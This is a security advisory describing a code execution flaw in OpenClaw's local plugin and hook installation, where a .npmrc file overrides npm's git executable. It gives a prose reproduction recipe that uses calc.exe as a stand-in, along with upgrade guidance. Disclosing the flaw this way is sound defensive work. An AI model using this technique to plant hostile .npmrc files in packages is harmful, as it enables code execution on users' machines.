OpenClaw Arbitrary Code Execution Vulnerability via .npmrc in Local Plugin and Hook Installation

A vulnerability allowing arbitrary code execution has been identified in OpenClaw versions prior to 2026.3.24. This issue arises during the installation of local plugins and hooks, where an attacker can execute malicious code by creating a .npmrc file that overrides the git executable. When npm install is executed in the staged package directory, the attacker can use git dependencies to run arbitrary programs specified in the .npmrc file.

Impact

Exploitation of this vulnerability allows for arbitrary code execution on the local machine during the installation of plugins or hooks.

Reproduction

To reproduce this vulnerability, create a local plugin or hook package that includes a .npmrc file. In the .npmrc file, set the git configuration to point to a malicious executable, such as calc.exe. Then, include a git dependency in the package.json file of the plugin or hook. When the package is installed using OpenClaw, the npm installer will read the .npmrc file, override the git executable path, and execute the specified program if a git dependency is present.

Remediation

Users should update to OpenClaw version 2026.3.24 or later, where this vulnerability has been patched.